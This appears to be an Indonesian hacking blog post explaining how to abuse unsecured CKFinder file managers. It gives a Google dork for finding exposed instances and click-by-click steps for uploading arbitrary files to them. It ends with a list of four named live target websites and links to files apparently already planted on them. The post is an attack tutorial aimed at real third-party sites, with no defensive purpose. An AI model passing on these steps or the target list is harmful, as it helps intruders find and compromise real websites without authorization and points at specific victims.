Vuln CKFinder File Upload

Okeh sob apa kabar :) , ya seperti biasa saya akan berabagi trik trik , lumayan mudah untuk dipraktekan :)
"Ckfinder File Upload Vulnerability"
Langsung saja yuk gan cekibroot >>.
Pertama kita seperti biasa mengandalkan dork google :

#Dork : inurl:ckfinder intext:"ckfinder.html" intitle:"Index of /ckfinder"    (dork kembangkan)
#Exploit : localhost/ckfinder/ckfinder.html

Langsung saja gan gunakan dorknya ,, masukan exploitnya ,,
Pilih situs yang sekiranya vuln ^_^ ,, jika vuln penampakannya seperti ini :

Klik tombol upload ,, klik tombol chose file untuk memilih file yang mau kamu upload ^_^ , kemudian klik tombol upload selected file ^_^ ,, tunggu hingga proses upload selesai ^_^ .
Jika ingin melihat hasilnya , klik kanan pada file kamu >> view :

Kemudian nanti akan muncul Pop-ap link menuju file kamu dan menampakannya ,, jika tidak ada , maka sebenarnya link file yang kamu upload telah menjadi Chace browser ^_^ . tinggal cek ke adrees bar nanti juga ada ^_^ .

Nah cukup mudah bukan ? ^_^ yahh mungkin hanya sampai disitu yang bisa saya sampaikan , terimakasih kunjungannya ^_^.

Live target :
http://www.lukoilmarine.com/ckfinder/ckfinder.html
http://fmolsisters.com/ckfinder/ckfinder.html
http://www.taipeigarden.com.tw/ckfinder/ckfinder.html
http://www.jnvjhansi.org/ckfinder/ckfinder.html
Contoh Hasil :

http://www.lukoilmarine.com/ckfinder/userfiles/files/pelurukertas.gif
http://fmolsisters.com/media/pelurukertas.gif
http://www.taipeigarden.com.tw/ckfinder/userfiles/files/pelurukertas.gif
http://www.jnvjhansi.org/ckfinder/userfiles/files/pelurukertas.gif